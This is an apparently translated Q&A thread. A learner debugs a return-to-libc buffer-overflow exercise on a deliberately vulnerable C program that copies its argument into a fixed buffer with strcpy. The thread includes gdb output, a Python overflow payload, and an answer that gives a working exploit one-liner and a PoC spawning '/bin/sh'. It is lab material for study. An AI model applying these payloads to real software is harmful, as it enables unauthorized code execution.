ROP缓冲区溢出练习问题

时间:2019-01-27 20:21:01

标签: c assembly x86 gdb buffer-overflow

我正在做this缓冲区溢出练习,但似乎无法正常工作...

在文章的调用参数部分下,他利用此程序使用变量not_used而不是/bin/date

char* not_used = "/bin/sh";

void not_called() {
    printf("Not quite a shell...\n");
    system("/bin/date");
}

void vulnerable_function(char* string) {
    char buffer[100];
    strcpy(buffer, string);
}

int main(int argc, char** argv) {
    vulnerable_function(argv[1]);
    return 0;
}

他通过获取not_usedsystem@plt内存地址,然后用它们替换堆栈来做到这一点:

| 0x8048580 <not_used>             |
| 0x43434343 <fake return address> |
| 0x8048360 <address of system>    |
| 0x42424242 <fake old %ebp>       |
| 0x41414141 ...                   |
|   ... (0x6c bytes of 'A's)       |
|   ... 0x41414141                 |

但是,当我尝试执行此操作时,我只会得到Segmentation Fault

frinto@kali:~/Documents/theclang/programs/rop/argrop$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x122e
(gdb) run
Starting program: /home/frinto/Documents/theclang/programs/rop/argrop/a.out 

Breakpoint 1, 0x5655622e in main ()
(gdb) print 'system@plt'
$1 = {<text variable, no debug info>} 0x56556050 <system@plt>
(gdb) x/s (int)not_used
0x56557008: "/bin/sh"
(gdb) 

然后我建立了有效负载并运行它:

frinto@kali:~/Documents/theclang/programs/rop/argrop$ ./a.out "$(python -c 'print "A"*0x6c + "BBBB" + "\x50\x60\x55\x56" + "CCCC" + "\x08\x70\x55\x56"')"
Segmentation fault

这里的问题可能是什么?预先感谢您的帮助!

P.S。内存随机化已禁用

1 个答案:

答案 0 :(得分:0)

如果NXASLR被禁用,只需执行ret2libc,不要将其定向为功能not_called()

我使用IDA Pro找到了not_used变量的字符串地址:

  1. 字符串/bin/sh地址= 0x08048530
  2. system()地址= 0xb7e36da0
  3. 假地址= JUNK

利用:

`python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`

PoC:

% ./vulnerable `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
$